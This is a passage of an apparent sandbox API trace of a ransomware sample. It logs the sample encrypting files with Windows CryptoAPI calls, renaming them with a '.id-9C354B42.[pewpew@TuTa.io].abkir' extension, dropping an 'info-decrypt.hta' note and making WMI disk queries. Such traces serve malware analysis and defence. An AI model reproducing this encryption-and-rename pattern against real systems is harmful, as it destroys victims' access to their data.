lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", nBufferLength=0x105, lpBuffer=0x691ee38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpFilePart=0x0) returned 0x35 [0199.310] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0199.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f298) returned 1 [0199.310] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), fInfoLevelId=0x0, lpFileInformation=0x691f314 | out: lpFileInformation=0x691f314*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x304bf640, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0199.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f294) returned 1 [0199.310] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0199.311] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x691ee50, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x35 [0199.311] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0199.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b8) returned 1 [0199.311] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f334 | out: lpFileInformation=0x691f334*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f735920, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2f735920, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2f735920, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0199.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b4) returned 1 [0199.311] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x691ee58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x35 [0199.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f304) returned 1 [0199.311] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), fInfoLevelId=0x0, lpFileInformation=0x37437ec | out: lpFileInformation=0x37437ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000)) returned 1 [0199.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f300) returned 1 [0199.312] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x691ed44, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x35 [0199.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f238) returned 1 [0199.312] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0199.312] GetFileType (hFile=0x208) returned 0x1 [0199.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f234) returned 1 [0199.312] GetFileType (hFile=0x208) returned 0x1 [0199.312] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x691f340 | out: lpFileSizeHigh=0x691f340*=0x0) returned 0x400000 [0199.324] ReadFile (in: hFile=0x208, lpBuffer=0x94a1018, nNumberOfBytesToRead=0x400000, lpNumberOfBytesRead=0x691f2ec, lpOverlapped=0x0 | out: lpBuffer=0x94a1018*, lpNumberOfBytesRead=0x691f2ec*=0x400000, lpOverlapped=0x0) returned 1 [0201.704] CloseHandle (hObject=0x208) returned 1 [0201.704] CryptAcquireContextW (in: phProv=0x691f28c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f28c*=0x66bbd08) returned 1 [0201.705] CryptGenRandom (in: hProv=0x66bbd08, dwLen=0x10, pbBuffer=0x37b5294 | out: pbBuffer=0x37b5294) returned 1 [0202.116] CryptImportKey (in: hProv=0x66bbd08, pbData=0x3746f9c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f25c | out: phKey=0x691f25c*=0xb7fc50) returned 1 [0202.116] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.117] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.117] CryptDuplicateKey (in: hKey=0xb7fc50, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f24c | out: phKey=0x691f24c*=0xb7f110) returned 1 [0202.117] CryptContextAddRef (hProv=0x66bbd08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.117] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x4, pbData=0x374707c*=0x1, dwFlags=0x0) returned 1 [0202.117] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x1, pbData=0x3747048, dwFlags=0x0) returned 1 [0202.289] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa220458*, pdwDataLen=0x691f2b8*=0x400010, dwBufLen=0x400010 | out: pbData=0xa220458*, pdwDataLen=0x691f2b8*=0x400010) returned 1 [0202.381] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37470a4*, pdwDataLen=0x691f2c0*=0x0, dwBufLen=0x10 | out: pbData=0x37470a4*, pdwDataLen=0x691f2c0*=0x10) returned 1 [0202.383] CryptDestroyKey (hKey=0xb7fc50) returned 1 [0202.383] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0202.383] CryptReleaseContext (hProv=0x66bbd08, dwFlags=0x0) returned 1 [0202.383] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x691ed30, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x35 [0202.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f224) returned 1 [0202.383] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0202.394] GetFileType (hFile=0x31c) returned 0x1 [0202.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f220) returned 1 [0202.394] GetFileType (hFile=0x31c) returned 0x1 [0202.394] WriteFile (in: hFile=0x31c, lpBuffer=0x37476a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f2b4, lpOverlapped=0x0 | out: lpBuffer=0x37476a0*, lpNumberOfBytesWritten=0x691f2b4*=0x20, lpOverlapped=0x0) returned 1 [0202.395] CloseHandle (hObject=0x31c) returned 1 [0202.395] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0202.395] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0202.395] CoTaskMemFree (pv=0xbed438) [0202.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.396] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f260 | out: ppv=0x691f260*=0xb51e34) returned 0x0 [0202.396] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f258 | out: pAptType=0x691f258*=1) returned 0x0 [0202.396] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f25c | out: ppvObject=0x691f25c*=0x0) returned 0x80004002 [0202.396] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.397] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ebc8 | out: ppv=0x691ebc8*=0x6027180) returned 0x0 [0202.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027180, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ede0 | out: ppvObject=0x691ede0*=0x0) returned 0x80004002 [0202.397] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027180, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edf4 | out: ppvObject=0x691edf4*=0x60313c0) returned 0x0 [0202.397] WbemDefPath:IUnknown:Release (This=0x6027180) returned 0x0 [0202.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea14 | out: ppvObject=0x691ea14*=0x60313c0) returned 0x0 [0202.397] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e9d0 | out: ppvObject=0x691e9d0*=0x0) returned 0x80004002 [0202.397] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0202.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0202.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e2dc | out: ppvObject=0x691e2dc*=0x0) returned 0x80004002 [0202.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e2e8 | out: ppvObject=0x691e2e8*=0x66ce598) returned 0x0 [0202.398] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce598, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e2f0 | out: pCid=0x691e2f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.398] WbemDefPath:IUnknown:Release (This=0x66ce598) returned 0x3 [0202.398] CoGetContextToken (in: pToken=0x691e348 | out: pToken=0x691e348) returned 0x0 [0202.398] CoGetContextToken (in: pToken=0x691e750 | out: pToken=0x691e750) returned 0x0 [0202.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e7e0 | out: ppvObject=0x691e7e0*=0x0) returned 0x80004002 [0202.398] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0202.398] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0202.398] CoGetContextToken (in: pToken=0x691f0d8 | out: pToken=0x691f0d8) returned 0x0 [0202.398] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0202.398] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x691f108*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f104 | out: ppvObject=0x691f104*=0x60313c0) returned 0x0 [0202.398] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0202.398] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0202.398] WbemDefPath:IWbemPath:SetText (This=0x60313c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f28c | out: puCount=0x691f28c*=0x0) returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f288*=0x0, pszText=0x0 | out: puBuffLength=0x691f288*=0x20, pszText=0x0) returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f288*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f288*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f28c | out: puCount=0x691f28c*=0x0) returned 0x0 [0202.398] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0202.399] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f294 | out: puResponse=0x691f294*=0xc19) returned 0x0 [0202.399] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f20c | out: puCount=0x691f20c*=0x0) returned 0x0 [0202.399] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f1f8 | out: puCount=0x691f1f8*=0x2) returned 0x0 [0202.399] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f4*=0xf, pszText=0x0) returned 0x0 [0202.399] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f1f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.399] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1a8 | out: ppv=0x691f1a8*=0xb51e34) returned 0x0 [0202.399] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1a0 | out: pAptType=0x691f1a0*=1) returned 0x0 [0202.399] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1a4 | out: ppvObject=0x691f1a4*=0x0) returned 0x80004002 [0202.399] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.400] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb10 | out: ppv=0x691eb10*=0x60271f0) returned 0x0 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed28 | out: ppvObject=0x691ed28*=0x0) returned 0x80004002 [0202.400] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed3c | out: ppvObject=0x691ed3c*=0x6031430) returned 0x0 [0202.400] WbemDefPath:IUnknown:Release (This=0x60271f0) returned 0x0 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e95c | out: ppvObject=0x691e95c*=0x6031430) returned 0x0 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e918 | out: ppvObject=0x691e918*=0x0) returned 0x80004002 [0202.400] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e224 | out: ppvObject=0x691e224*=0x0) returned 0x80004002 [0202.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e230 | out: ppvObject=0x691e230*=0x66ce408) returned 0x0 [0202.400] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce408, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e238 | out: pCid=0x691e238*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.400] WbemDefPath:IUnknown:Release (This=0x66ce408) returned 0x3 [0202.400] CoGetContextToken (in: pToken=0x691e290 | out: pToken=0x691e290) returned 0x0 [0202.401] CoGetContextToken (in: pToken=0x691e698 | out: pToken=0x691e698) returned 0x0 [0202.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e728 | out: ppvObject=0x691e728*=0x0) returned 0x80004002 [0202.401] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0202.401] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0202.401] CoGetContextToken (in: pToken=0x691f020 | out: pToken=0x691f020) returned 0x0 [0202.401] CoGetContextToken (in: pToken=0x691ef80 | out: pToken=0x691ef80) returned 0x0 [0202.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x691f050*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f04c | out: ppvObject=0x691f04c*=0x6031430) returned 0x0 [0202.401] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0202.401] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0202.401] WbemDefPath:IWbemPath:SetText (This=0x6031430, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0202.401] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f1d0 | out: puCount=0x691f1d0*=0x2) returned 0x0 [0202.401] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f1cc*=0x0, pszText=0x0 | out: puBuffLength=0x691f1cc*=0xf, pszText=0x0) returned 0x0 [0202.401] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f1cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.401] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1d0 | out: ppv=0x691f1d0*=0xb51e34) returned 0x0 [0202.401] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1c8 | out: pAptType=0x691f1c8*=1) returned 0x0 [0202.401] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1cc | out: ppvObject=0x691f1cc*=0x0) returned 0x80004002 [0202.401] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.402] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691edf0 | out: ppv=0x691edf0*=0x6024bd8) returned 0x0 [0202.402] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f008 | out: ppvObject=0x691f008*=0x0) returned 0x80004002 [0202.402] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024bd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f01c | out: ppvObject=0x691f01c*=0x6027230) returned 0x0 [0202.402] WbemLocator:IUnknown:Release (This=0x6024bd8) returned 0x0 [0202.402] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec3c | out: ppvObject=0x691ec3c*=0x6027230) returned 0x0 [0202.402] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebf8 | out: ppvObject=0x691ebf8*=0x0) returned 0x80004002 [0202.403] WbemLocator:IUnknown:AddRef (This=0x6027230) returned 0x3 [0202.403] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, 